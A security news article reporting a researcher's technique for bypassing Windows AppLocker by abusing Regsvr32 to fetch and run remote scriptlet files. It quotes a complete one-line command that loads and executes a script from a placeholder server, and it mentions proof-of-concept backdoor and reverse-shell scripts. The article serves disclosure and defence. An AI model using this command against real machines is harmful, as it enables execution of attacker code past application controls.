Security Experts:

Connect with us

Hi, what are you looking for?



Windows AppLocker Bypassed to Execute Remote Scripts

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

When AppLocker was introduced in Windows 7 and Windows Server 2008 R2, Microsoft provided administrators with the ability to set rules to allow or deny applications from running. These rules could be enforced for specific users or groups and could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

In order to successfully bypass Windows AppLocker, an attacker needs to already have a foothold on the target machine, and also has to abuse Regsvr32, a command-line utility designed for registering DLLs in the registry, security researcher Casey Smith explains.

The researcher was looking for a way to register a script to bypass AppLocker, and discovered that the best way to do so is to place the script block inside of the Registration tag and then to call Regsvr32 to have the code executed. Moreover, Smith discovered that the code in the registration element executes on register and unregister.

Abusing Regsvr32 to execute the script comes with a series of benefits, as the command-line tool is proxy aware, uses TLS, follows redirects, and can also be set to run silently and to not display any message boxes.

“So, all you need to do is host your .sct file at a location you control. From the target, simply execute regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. It’s not well documented that Regsvr32 can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element,” the researcher explains.

Smith also said that the bypass can be used to call a local file, and that executing the script from the registration element doesn’t actually register the COM object, meaning that nothing will appear in registry. The researcher created a set of proof-of-concept scripts that can be loaded via Regsvr32 to open a backdoor or a reverse shell over HTTP.

Present even in Windows 10, the latest operating system version from Microsoft, AppLocker is considered as one of the most important security features in the platform. In February, when revealing Enhanced Mitigation Experience Toolkit (EMET) 5.5, Microsoft said that, next to Device Guard, and CFG, AppLocker is one of the Windows 10 features that provides equivalent (or better) mitigations than EMET.

This is not the first time the Regsvr32 component is found to provide intruders with the possibility to perform nefarious operations on target computers. In 2014, the Neverquest banking Trojanwas also abusing it to execute its DLL module.

Written By

Click to comment

Expert Insights

Related Content

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

Mobile & Wireless

Apple rolled out iOS 16.3 and macOS Ventura 13.2 to cover serious security vulnerabilities.

Mobile & Wireless

Technical details published for an Arm Mali GPU flaw leading to arbitrary kernel code execution and root on Pixel 6.

Mobile & Wireless

Apple’s iOS 12.5.7 update patches CVE-2022-42856, an actively exploited vulnerability, in old iPhones and iPads.


Security researchers have observed an uptick in attacks targeting CVE-2021-35394, an RCE vulnerability in Realtek Jungle SDK.


Google has awarded more than $25,000 to the researchers who reported the vulnerabilities patched with the release of the latest Chrome update.

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.

Mobile & Wireless

Two vulnerabilities in Samsung’s Galaxy Store that could be exploited to install applications or execute JavaScript code by launching a web page.